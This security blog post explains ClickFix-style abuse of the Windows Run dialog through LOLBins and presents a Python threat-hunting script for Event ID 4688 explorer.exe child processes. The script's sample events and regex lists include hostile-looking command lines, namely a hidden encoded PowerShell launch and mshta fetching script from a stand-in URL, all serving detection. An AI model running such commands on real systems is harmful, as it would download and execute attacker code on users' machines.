When the Run Dialog Becomes an Attack Vector
- Mar 27

Recent research from Atos described a new variant of the ClickFix social engineering technique, where attackers trick users into executing malicious commands through the Windows Run dialog (Win + R).
Instead of delivering traditional malware, attackers rely on user interaction with built-in Windows tools. Victims are instructed to copy and run commands that appear to resolve an issue - such as fixing a browser problem or completing a verification step. In reality, these commands execute scripts or download attacker-controlled payloads.
Because the activity is initiated by the user and relies on legitimate system binaries, it can blend in with normal system behavior and evade traditional security controls.
The Technique: Living-off-the-Land Execution
The Windows Run dialog allows users to execute commands directly through Windows Explorer. While designed for convenience, it can also serve as a simple execution mechanism for attackers.
In the campaigns described by researchers, victims were instructed to run commands invoking common Living-off-the-Land binaries (LOLBins) such as:
- powershell.exe
- cmd.exe
- rundll32.exe
- mshta.exe
- regsvr32.exe
These tools are legitimate Windows components frequently used for administrative tasks. However, when executed with malicious parameters, they can download additional payloads, run scripts, or establish persistence without introducing obvious malware files.
Since these commands are typically launched by explorer.exe, the activity may appear similar to normal user behavior at first glance.
Investigating Suspicious Run Dialog Activity
Following the research, CyberSift conducted a targeted threat hunt across Windows process creation logs to identify suspicious executions initiated by explorer.exe.
We focus on:
- Parent-child process relationships where explorer.exe spawns commonly abused command interpreters
- Execution of these binaries in unusual contexts or outside standard administrative workflows
Most hits represent legitimate user or administrative activity, but this approach provides early visibility into potentially risky command execution.
Translating Threat Intel into Detection
At CyberSift, we translate threat intelligence into practical detection controls. For this scenario, we created a detection rule [Link] monitoring Event ID 4688, which flags executions of less common command interpreters and system binaries when spawned by explorer.exe outside expected workflows. This ensures that rare, potentially malicious activity is detected without generating noise from normal administrative actions.
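As an added illustration of the hunt described above (example code written for this page, not CyberSift's own detection rule, which is linked in the post), the following Python applies the explorer.exe-parent / LOLBin-child logic to the Event ID 4688 fields (NewProcessName, ParentProcessName, CommandLine) of a handful of constructed sample events. The suppression of bare interactive shell launches, the allow-listed admin-script path `C:\AdminTools\`, and the command-line indicator patterns used to raise severity are assumptions added for illustration; the sample events are constructed, not real telemetry.

```python
"""Toy hunt for Run-dialog (ClickFix) abuse: Event ID 4688 process creations
where explorer.exe spawns a command interpreter or other LOLBin.

Sample events, allow-list and indicator patterns are constructed for this
example and are not CyberSift's rule; tune them for your environment."""

import re
from dataclasses import dataclass

# LOLBins named in the post as commonly abused from the Run dialog
LOLBINS = {"powershell.exe", "cmd.exe", "rundll32.exe", "mshta.exe", "regsvr32.exe"}

# Command-line traits that make an explorer.exe-spawned LOLBin worth a closer
# look (assumed indicator set; order determines the order of the labels)
SUSPICIOUS_ARGS = [
    (r"(?i)-(enc|encodedcommand)\b", "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)https?://", "remote URL"),
    (r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b", "download cradle"),
]

# Assumed "expected workflow": admin scripts launched from this folder are routine
EXPECTED_WORKFLOWS = [r"(?i)C:\\AdminTools\\"]


@dataclass(frozen=True)
class Alert:
    severity: str
    process: str
    command_line: str
    indicators: tuple


def basename(path: str) -> str:
    """Last path component, lower-cased, so 4688 full paths compare cleanly."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_expected_workflow(child: str, cmdline: str) -> bool:
    """Suppress a bare interactive shell (no arguments) and allow-listed scripts."""
    bare = cmdline.strip().strip('"').lower()
    if bare.endswith(child):          # e.g. cmd.exe opened with no arguments
        return True
    return any(re.search(p, cmdline) for p in EXPECTED_WORKFLOWS)


def analyze_event(event: dict):
    """Return an Alert for explorer.exe -> LOLBin executions, else None."""
    if event.get("EventID") != 4688:
        return None
    child = basename(event.get("NewProcessName", ""))
    parent = basename(event.get("ParentProcessName", ""))
    if parent != "explorer.exe" or child not in LOLBINS:
        return None
    cmdline = event.get("CommandLine", "")
    if is_expected_workflow(child, cmdline):
        return None
    indicators = tuple(label for pat, label in SUSPICIOUS_ARGS if re.search(pat, cmdline))
    # Any hit is visibility-worthy; command-line indicators raise the priority
    return Alert("high" if indicators else "low", child, cmdline, indicators)


def run_hunt(events):
    """Apply analyze_event over a batch of 4688 events, keeping event order."""
    return [a for a in (analyze_event(e) for e in events) if a is not None]


EXPLORER = r"C:\Windows\explorer.exe"
SYS32 = r"C:\Windows\System32"

# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    {"EventID": 4688, "ParentProcessName": EXPLORER,
     "NewProcessName": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc BASE64_PLACEHOLDER"},
    {"EventID": 4688, "ParentProcessName": EXPLORER,
     "NewProcessName": SYS32 + r"\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify"},
    {"EventID": 4688, "ParentProcessName": EXPLORER,          # bare shell
     "NewProcessName": SYS32 + r"\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventID": 4688, "ParentProcessName": SYS32 + r"\services.exe",
     "NewProcessName": SYS32 + r"\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 4688, "ParentProcessName": EXPLORER,          # not a LOLBin
     "NewProcessName": SYS32 + r"\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 4688, "ParentProcessName": EXPLORER,          # allow-listed
     "NewProcessName": SYS32 + r"\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\AdminTools\cleanup.cmd"'},
    {"EventID": 4688, "ParentProcessName": EXPLORER,          # routine, low
     "NewProcessName": SYS32 + r"\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for alert in run_hunt(SAMPLE_EVENTS):
        print(f"[{alert.severity}] {alert.process}: {alert.command_line} {alert.indicators}")
```

Run against the constructed batch, the hunt surfaces three of the seven events: the encoded hidden PowerShell and the mshta URL launch as high, and the rundll32 Control Panel call as low, matching the post's observation that most explorer.exe-spawned LOLBin hits are benign and need context before they become alerts.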
Key Takeaway
Attackers no longer need sophisticated malware if they can convince users to execute commands on their behalf.
By monitoring behavioral patterns involving trusted system utilities and translating threat intelligence into actionable detection rules, CyberSift helps organizations detect Run dialog abuse and Living-off-the-Land execution before it escalates into a broader compromise.

- Written by Andy Urlep, Security Analyst, CyberSift